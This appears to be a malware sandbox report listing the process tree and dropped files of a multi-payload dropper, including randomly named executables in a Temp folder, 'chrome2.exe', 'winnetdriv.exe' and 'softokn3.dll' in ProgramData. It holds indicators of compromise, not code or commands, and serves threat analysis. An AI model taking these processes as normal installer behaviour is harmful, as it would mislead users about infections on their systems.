C:\Windows\system32\cmd.exe /c 5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\61d1121b032c3d74.exe

61d1121b032c3d74.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\d5a6f77b01f6.exe

d5a6f77b01f6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe

0637ac7677d0cf7.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe

f08378aa2c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe

17e6077dcf7a402.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe

5d456d381f2e1.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\08280a9f8.exe

08280a9f8.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe

97c06d9b6fa6f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe

5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 344 -ip 344

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 564

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe" -a

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1888 -ip 1888

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 356

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733562933 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2192 -ip 2192

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 1120

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

Network

Files

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\setup_install.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\libwinpthread-1.dll

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\libcurlpp.dll

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\libcurl.dll

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\libstdc++-6.dll

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\61d1121b032c3d74.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\97c06d9b6fa6f9.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\17e6077dcf7a402.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e010.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\08280a9f8.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\5d456d381f2e1.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\f08378aa2c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\0637ac7677d0cf7.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\d5a6f77b01f6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0DF1A947\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

C:\Users\Admin\AppData\Local\Temp\setup.exe

C:\ProgramData\softokn3.dll
